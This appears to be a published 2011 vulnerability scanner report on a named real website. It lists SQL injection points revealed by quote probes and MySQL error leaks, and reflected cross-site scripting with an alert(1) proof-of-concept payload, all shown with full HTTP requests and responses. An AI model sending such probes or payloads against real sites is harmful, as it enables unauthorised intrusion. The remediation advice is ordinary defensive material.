2-19-2011, SQL Injection, DORK, CWE-89, crimsonlogic.com

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Feb 19 10:57:25 CST 2011.


1. SQL injection

1.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

1.2. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]

1.3. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

1.4. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]

1.5. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

1.6. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]

1.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

1.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]

2.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]

2.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]

2.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]

2.5. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]

2.6. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

2.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_company parameter]

2.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_email parameter]

2.9. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_message parameter]

2.10. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_name parameter]

2.11. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_telephone parameter]

2.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_validator parameter]

2.13. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

2.14. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

2.15. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

2.16. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

2.17. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

2.18. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

2.19. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

2.20. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

2.21. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

2.22. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

3. SQL statement in request parameter

4. Cookie without HttpOnly flag set

4.1. http://www.outsourcingdotnetdevelopment.com/mail/captcha.php

4.2. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html

5. Cross-domain Referer leakage

6. Cross-domain script include

6.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

6.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html

6.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html

6.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html

7. Email addresses disclosed

8. Robots.txt file



1. SQL injection
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:59 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...

1.2. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...

1.3. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:06 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...

1.4. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...

1.5. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:04 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...

1.6. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:43 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...

1.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:14 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 13797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

1.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

2. Cross-site scripting (reflected)
There are 22 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2d0"><script>alert(1)</script>a4a9133cc3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?2e2d0"><script>alert(1)</script>a4a9133cc3c=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
